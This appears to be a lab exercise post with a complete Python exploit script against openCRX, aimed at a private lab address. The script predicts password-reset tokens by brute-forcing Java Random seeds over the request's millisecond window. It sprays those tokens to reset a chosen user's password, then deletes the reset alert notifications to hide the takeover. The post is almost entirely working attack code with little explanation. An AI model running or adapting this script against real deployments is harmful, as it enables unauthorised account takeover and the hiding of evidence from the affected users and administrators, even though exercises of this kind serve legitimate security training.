t=resetToken&p=CRX&s=Standard&id=guest&password1=password&password2=password

R3zk0n ยท October 2, 2025

API
Contents

    10.2.5

    Automate the entire password reset attack chain, including the deletion of any password reset alerts that are generated.

    #!/usr/bin/python3

import requests
import argparse
from jnius import autoclass
import time
import json

rand = autoclass('java.util.Random')()
token_array = []

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

def current_milli_time():
    return round(time.time() * 1000)

def getRandomBase62(length, seed):
    s = ""
    alphabet = list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
    rand.setSeed(int(seed))
    for i in range(length):
        s = s + alphabet[rand.nextInt(62)]
    return s

def getDateRequest(user_role):
    target = "http://192.168.141.126:8080/opencrx-core-CRX/RequestPasswordReset.jsp"

    print("Sending date request...")
    user = {"id": user_role}
    start = current_milli_time()
    req = requests.post(url=target, data = user, proxies=proxies)
    stop = current_milli_time()
    print("Password reset request sent to: " + str(user_role))
    return (start, stop)

def resetPasswordBrute(args):
    target = "http://192.168.141.126:8080/opencrx-core-CRX/PasswordResetConfirm.jsp"

    print("Starting token spray. Standby.")
    for word in token_array:
        print(word)
        payload = {'t':word.rstrip(), 'p':'CRX','s':'Standard','id':args.user,'password1':args.password,'password2':args.password}

        r = requests.post(url=target, data=payload, proxies=proxies)
        res = r.text

        if "Unable to reset password" not in res:
            print("Successful reset with token: %s" % word)
            break

def retrieveAlerts(username, password):
    url_list = []
    targets = f"http://192.168.141.126:8080/opencrx-rest-CRX/org.opencrx.kernel.home1/provider/CRX/segment/Standard/userHome/{username}/alert"
    
    print("Retrieving Alerts...")
    res = requests.get(url=targets, auth=(username, password), proxies=proxies, headers={"Content-Type": "application/json"})
    if res.status_code == 200:
        json_data = res.json()
        for i in range(len(json_data)):
            try:
                print(json_data['objects'][i]['@type'])
                if json_data['objects'][i]['@type'] == "org.opencrx.kernel.home1.Alert":
                    url = json_data['objects'][i]['@href']
                    url_list.append(url)
            except:
                print("Ignoring some listings...")

    print("Deleting Alerts...")
    for url in url_list:
        req = requests.delete(url=url, auth=(username, password), proxies=proxies, headers={"Content-Type": "application/json"})
    
    print("Alerts have been deleted!")

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--user', help='Username to target', required=True)
    parser.add_argument('-p','--password', help='Password value to set', required=True)
    args = parser.parse_args()

    user = args.user
    start, stop = getDateRequest(user)
    print(stop - start)

    for x in range(start, stop):
        token = getRandomBase62(40, x)
        token_array.append(token)
    
    resetPasswordBrute(args)

    retrieveAlerts(args.user, args.password)

if __name__ == '__main__':
    main()

    Twitter, Facebook